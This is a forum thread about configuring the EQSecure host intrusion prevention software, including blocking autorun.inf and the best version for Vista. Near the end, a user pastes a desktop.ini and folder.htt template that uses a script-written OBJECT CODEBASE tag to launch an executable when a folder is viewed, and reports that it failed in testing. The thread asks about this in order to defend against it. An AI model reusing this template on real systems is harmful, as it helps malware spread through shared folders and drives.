EQSecure 3.41 Settings

not to mention is free,ofcourse it will be super-nice if we get the chance to dirty our hands on it for peace of mind and heart satisfactionvery sad that these people dont want to share theier treasure

 

@jmonge: thanks but i'll pass.

Here's another wonderful screenshot of their meticulous translation (sarcasm):

 

hey alcon i understandwhat language is that?korean?

 

It's called garbage...

 

ah anyway did you tried an alternative alcon?

 

jmonge, for now, my alternative is a properly configured Win7 in LUA mode.

 

ah i see

 

Now that is what I call a paradigm shift (or do you have found some secret configurtion options)?

 

Dear all,
i try to lock down Autorun.inf (create, read, modify) on File Protection, but possible to do delete.
So i did settings:
Autorun.inf
Create file: block
Read file: block
Modify file: block
Delete file: allow

but EQSecure always block my access when tried to delete autorun.inf

So, do you have any idea? I just want to block malware loaded from autorun.inf, even i already turn off autorun feature from regedit & gpedit.msc, but when you open My Computer then double click Flash Disk Drive, autorun.inf still loaded.

 

An half-baked UAC prompt (without parent/child processes and operations indication) is rather lame but that's better than nothing.

With EQS, something that can't be read can't be deleted.

Blocking autorun.inf creation and modification with the file module isn't a bad idea for certain types of malwares but, of course, that will not be sufficient.

I suggest that you find the solution to the problem via the application protection module.

On another note, the "Ignore" action is always better than "Allow". It prevents overlaps with other rules.

 

i havent been keeping track of EQS lately, but im interested, what is the latest version thats in English and works on Vista? thx

 

it is 4.2 it is lite version

 

what do u mean by lite version, is it crippled or something? or would v3.41 still be the best choice?

 

it is criple indeed i tried an older version and was way better this new version is lacking alot of stuff a hips should have

 

alright, well seems 3.41 with alcyon custom rules wuld be the best then in that case, btw does 3.41 work with vista?

 

3.41 for vista mmmm not sure buddy

 

the new lite version is for sure(vista ready)

 

hmm well i guess even if its crippled, its still decent protection right? do u got a link to it btw?

 

for sure it is better than any antivirus as it protects(sandbox pc)protects system 32 in real time and that is very important you can set it to ignore mode and it will block all attempts to write/modiffy/delete to the hard drive it is simple but still has some power.
note the only thing is that can not play with rules like MD or ssm
http://www.3dprotect.com/en/downloads.html

 

hmm that sounds cool still, im basically looking for a BB replacement anyways, so this wuld fit best probably, thx.

 

for free what else,it is hard to find some thing free that works

 

hey, i want to ask..
how does virus that spread with desktop.ini works? do i need to block modify of desktop.ini ? i worry there is problem with folder view setting.

what is the relation between desktop.ini and folder.htt?

last.. how do i secure from those things with EQSecure?

thank you,
yudi

 

those locations are secure by default

 

jmonge, what do you mean? can you explain?
http://www.microsoft.com/technet/security/Bulletin/MS03-027.mspx

desktop.ini :
[.ShellClassInfo]
ConfirmFileOp=0
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://folder.htt
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

folder.htt :
<html>
<head>
<meta http-equiv="content-type"content="text/html; charset=Windows-1252">
</head>
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1
classid= "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100%; height: 100%" tabIndex=-1>
</object>
</body>
</html>
<script>
objectstr="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
objectstr+="CODEBASE=\"(EXE FILENAME)#version=1,1,1,1\">"
objectstr+="<PARAM NAME=\"_Version\" VALUE=\"65536\">"
objectstr+="</OBJECT>"
objectstr+="<HTML><H1></H1></HTML>";
document.writeln(objectstr);
document.close();
</script>


well, i tried experiment with this several times.. but the script Desktop.ini can not load the folder.htt (so can not run the exe too).

 

those locations are protected by default ''by'' eqsecure that is what i meant eqsecure has a sandbox that protects the user space my documents/destop etc,etc and also protects your system/ system32 in real time